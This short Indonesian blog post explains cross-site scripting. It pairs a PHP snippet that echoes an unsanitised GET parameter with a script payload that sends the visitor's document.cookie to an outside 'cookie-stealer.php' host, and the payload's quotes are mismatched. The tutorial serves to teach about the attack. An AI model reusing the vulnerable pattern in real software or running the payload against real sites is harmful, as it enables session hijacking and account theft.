Information Technology Articles :: SEO Tips :: WAP Articles :: Search Engine Marketing :: Internet Tips

Goedangilmu

XSS (Cross Site Scripting)

Posted on July 30th, 2008 in Web Development, 191 views

XSS atau Cross Site Scripting adalah salah satu cara untuk melakukan hacking, secara umum cara ini biasanya memasukkan perintah javascript ke dalam halaman web dengan tujuan untuk mencuri cookies dari halaman web yang biasanya mengandung data yang penting misalnya informasi login.

Contoh :

$id = $_GET['id'];
echo 'Displaying news item number '.$id;


Jika  $_GET['id'] berisi angka maka hal ini tidak akan menjadi masalah tetapi jika mengandung script berikut :

<script>
window.location.href = "http://chat2konco.com/cookie-stealer.php?c=' + document.cookie;
</script>

Maka ketika web scripting mengeksekusinya cookies dari pengakses web tersebut akan terkirim ke penyerang dan akibatnya penyerang tersebut dapat mempergunakan cookies tersebut untuk login.

Related Posts :

Published by Adith

No Comments

Leave a comment